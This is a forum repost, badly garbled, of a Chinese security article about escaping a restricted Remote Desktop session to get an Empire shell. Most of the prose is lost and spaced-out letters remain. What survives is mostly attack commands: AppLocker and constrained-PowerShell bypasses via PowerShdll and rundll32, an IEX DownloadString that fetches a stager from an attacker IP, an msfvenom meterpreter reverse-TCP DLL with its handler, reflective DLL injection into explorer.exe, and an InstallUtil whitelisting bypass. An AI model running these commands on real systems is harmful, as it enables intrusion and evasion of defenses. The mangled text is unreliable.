搜索

[13298] 2018-10-14_从远程桌面服务到获取EmpireShell

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2018-10-14_从远程桌面服务到获取EmpireShell E m p i r e   S h e l l s e c i s t   F r e e B u f   2 0 1 8 - 1 0 - 1 4 访 访   A p p L o c k e r     P o w e r S h e l l     E m p i r e   s h e l l P o w e r S h e l l   P o w e r S h e l l   使 使   W i n d o w s   D e f e n d e r   R D S 8 0 . N e t   v 3 . 5 P o w e r S h d l l d l l p o w e r s h e l l . e x e P o w e r s h e l l P o w e r S h e l l I / O . S y s t e m . M a n a g e m e n t . A u t o m a t i o n . d l l   R D S   n o t e p a d     s h e l l h t t p s : / / b l o g . n e t s p i . c o m / b r e a k i n g - o u t - o f - a p p l i c a t i o n s - d e p l o y e d - v i a - t e r m i n a l - s e r v i c e s - c i t r i x - a n d - k i o s k s / h t t p s : / / w w w . p e n t e s t p a r t n e r s . c o m / s e c u r i t y - b l o g / b r e a k i n g - o u t - o f - c i t r i x - a n d - o t h e r - r e s t r i c t e d - d e s k t o p - e n v i r o n m e n t s /   - >     - >   I E I E   - >   - > l o l . p s 1
I E   - >   p o w e r s h e l l . e x e I E   - > p s 1   P o w e r S h e l l P o w e r S h e l l P o w e r S h e l l $ E x e c u t i o n C o n t e x t . S e s s i o n S t a t e . L a n g u a g e M o d e C o n s t r a i n e d L a n g u a g e   P o S h   h t t p s : / / g i t h u b . c o m / p 3 n t 4 / P o w e r S h d l l P o w e r S h d l l 使 p y t h o n   - m   S i m p l e H T T P S e r v e r   8 0 K a l i W e b p o w e r s h d l l . d l l I E h t t p : / / 1 0 . 7 . 2 5 3 . 1 0 / P o w e r S h d l l . d l l   - > P o w e r S h d l l . d l l C : W i n d o w s T a s k s A p p l o c k e r C : U s e r s U s e r n a m e D e s k t o p
A p p l o c k e d D L L P o w e r S h e l l 使 r u n d l l 3 2 d l l P o w e r S h e l l $ E x e c u t i o n C o n t e x t . S e s s i o n S t a t e . L a n g u a g e M o d e F u l l L a n g u a g e 使 s e t   B a s e 6 4   f a l s e s e t   O u t f i l e   s h e l l E m p i r e s t a g e r P o w e r S h e l l s h e l l r u n d l l 3 2   . P o w e r S h d l l . d l l , m a i n   - w I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( ' h t t p : / / 1 0 . 7 . 2 5 3 . 1 8 / s h e l l ' ) ;
D e f e n d e r E m p i r e   s h e l l / a g e n t   m e t e r p r e t e r   s h e l l d l l   p a y l o a d m s f 使 p a y l o a d 使 I E m s f . d l l W i n d o w s   D e f e n d e r p a y l o a d p a y l o a d x 6 4 D e f e n d e r 使 r u n d l l 3 2 d l l 使 r u n d l l 3 2 A p p l o c k e r m e t e r p r e t e r   s h e l l m s f v e n o m   - a   x 6 4   - - p l a t f o r m   w i n d o w s   - p   w i n d o w s / x 6 4 / m e t e r p r e t e r / r e v e r s e _ t c p   l h o s t = 1 0 . 1 0 . 1 4 . 2   l p o r t = 8 0 8 1   - f   d l l   - o   m s f . d l l u s e   m u l t i / h a n d l e r s e t   h o s t   t u n 0 s e t   p o r t   8 0 8 1 s e t   p a y l o a d   w i n d o w s / x 6 4 / m e t e r p r e t e r / r e v e r s e _ t c p e x p l o i t r u n d l l 3 2   . m s f . d l l , C o n t r o l _ R u n D L L
  p o w e r s h e l l . e x e     E m p i r e m e t a s p l o i t E m p i r e e m p i r e   l i s t e n e r     s t a g e r B a s e 6 4 f a l s e s t a g e r p o w e r s h e l l . e x e p o w e r s h e l l . e x e M S F s h e l l e m p i r e   l i s t e n e r E m p i r e a g e n t   p o w e r s h e l l     a p p l o c k e r p o w e r s h e l l h t t p s : / / i m p r o s e c . c o m / b l o g / b a b u s h k a - d o l l s - o r - h o w - t o - b y p a s s - a p p l i c a t i o n - w h i t e l i s t i n g - a n d - c o n s t r a i n e d - p o w e r s h e l l 1 . 使 w i n d o w s / h t a l i s t e n e r h t a   s t a g e r 2 . v i s u a l   s t u d i o R e f l e c t i v e P i c k   p r o j e c t h t a   b a s e 6 4   s h e l l   s t a g e r d l l R e f l e c t i v e P i c k _ x 6 4 . d l l u s e l i s t e n e r   h t t p s e t   H o s t   1 0 . 7 . 2 5 3 . 1 8 s e t   P o r t   4 4 4 4 e x e c u t e b a c k u s e s t a g e r   m u l t i / l a u n c h e r s e t   B a s e 6 4   f a l s e g e n e r a t e l o a d   p o w e r s h e l l p o w e r s h e l l _ s h e l l
3 . 使 P S D L L b a s e 6 4 4 . d l l . t x t I n v o k e - R e f l e c t i v e P E I n j e c t i o n . p s 1 5 . 使 h t t p s : / / w w w . b a s e 6 4 e n c o d e . o r g / 线 B a s e 6 4 V S B y p a s s   p r o j e c t e n c o d e d 使 V S B y p a s s . e x e 6 . 使 i n s t a l l u t i l . e x e b y p a s s . e x e * c h r y z s h F B   s e c i s t   F r e e B u f . C O M $ C o n t e n t   =   G e t - C o n t e n t   . R e f l e c t i v e P i c k _ x 6 4 . d l l   - E n c o d i n g   B y t e $ E n c o d e d   =   [ S y s t e m . C o n v e r t ] : : T o B a s e 6 4 S t r i n g ( $ C o n t e n t ) $ E n c o d e d   |   O u t - F i l e   " C : W i n d o w s T a s k s d l l . t x t " $ d l l D a t a   =   " D L L B A S E 6 4 _ G O E S _ H E R E " $ P r o c I d   =   ( G e t - P r o c e s s   e x p l o r e r ) . I d $ B y t e s   =   [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ d l l D a t a ) I n v o k e - R e f l e c t i v e P E I n j e c t i o n   - P E B y t e s   $ B y t e s   - P r o c I d   $ P r o c I d s e t - l o c a t i o n   t s c l i e n t l k y l a b s c o p y - i t e m   . B y p a s s . e x e   c : w i n d o w s t a s k s c d   c : w i n d o w s t a s k s C : w i n d o w s M i c r o s o f t . N E T F r a m e w o r k 6 4 v 4 . 0 . 3 0 3 1 9 I n s t a l l U t i l . e x e   / l o g f i l e =   / L o g T o C o n s o l e = f a l s e   / U   C : W i n d o w s T a s k s B y p a s s . e x e
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理